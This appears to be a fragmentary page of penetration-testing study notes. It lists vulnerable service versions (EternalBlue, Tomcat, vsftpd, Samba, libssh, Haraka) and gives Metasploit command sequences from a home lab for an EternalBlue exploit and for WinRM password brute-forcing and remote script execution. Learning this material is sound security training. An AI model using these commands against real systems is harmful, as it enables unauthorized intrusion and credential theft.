Exploitation
Last updated
Last updated
A HFS (HTTP File Server) is a file and documents sharing web server.
Rejetto HFS - free open source HTTP file server
🔬
EternalBlue takes advantage of a Windows SMBv1 protocol vulnerability
Patch was released in March 2017
🔬 Check the
Some MSF useful commands from my Home Lab (Kali VM + Win 2008_R2 Server
)
service postgresql start && msfconsole -qdb_statussetg RHOSTS 192.168.31.131setg RHOST 192.168.31.131workspace -a EternalBluedb_nmap -sS -sV -O 192.168.31.131search type:auxiliary EternalBlueuse auxiliary/scanner/smb/smb_ms17_010optionsrunsearch type:exploit EternalBlueuse exploit/windows/smb/ms17_010_eternalblueoptionsrun
Identify WinRM users with MSF and exploit WinRM by obtaining access credentials.
Default WinRM HTTP port is 5985
and HTTPS 5986
Tomcat default TCP port is 8080
Apache web server host HTML/PHP web apps, instead
Apache Tomcat < v.8.5.23
is vulnerable to a JSP Upload Bypass / RCE
vsftpd v.2.3.4
is vulnerable to a command execution vulnerability
Samba
is the Linux implementation of SMB.
Samaba v.3.5.0
is vulnerable to a RCE vulnerability
libssh
is a C library that implements the SSHv2 protocol
SSH
default TCP port is 22
libssh v.0.6.0 - 0.8.0
is vulnerable to an authentication bypass vulnerability
SMTP
default TCP port is 25
other TCP ports are 465
and 587
Haraka prior to v.2.8.9
is vulnerable to command injection
🔬
service postgresql start && msfconsole -qdb_statussetg RHOSTS 10.2.27.173setg RHOST 10.2.27.173workspace -a WinRMdb_nmap -sS -sV -O -p- 10.2.27.173# Port 5985 is set up for WinRMsearch type:auxiliary winrmuse auxiliary/scanner/winrm/winrm_auth_methodsoptionsrun# Brute force WinRM loginsearch winrm_loginuse auxiliary/scanner/winrm/winrm_loginset USER_FILE /usr/share/metasploit-framework/data/wordlists/common_users.txtset PASS_FILE /usr/share/metasploit-framework/data/wordlists/unix_passwords.txtsearch winrm_cmduse auxiliary/scanner/winrm/winrm_cmdset USERNAME administratorset PASSWORD tinkerbellset CMD whoamirunsearch winrm_scriptuse exploit/windows/winrm/winrm_script_execset USERNAME administratorset PASSWORD tinkerbellset FORCE_VBS trueexploit
is a free open source Java servlet web server, build to host dynamic websites and web apps developed in Java.
🔬
is an Unix FTP server.
🔬
🔬
🔬
is an open source high performance SMTP server developed in Node.js
🔬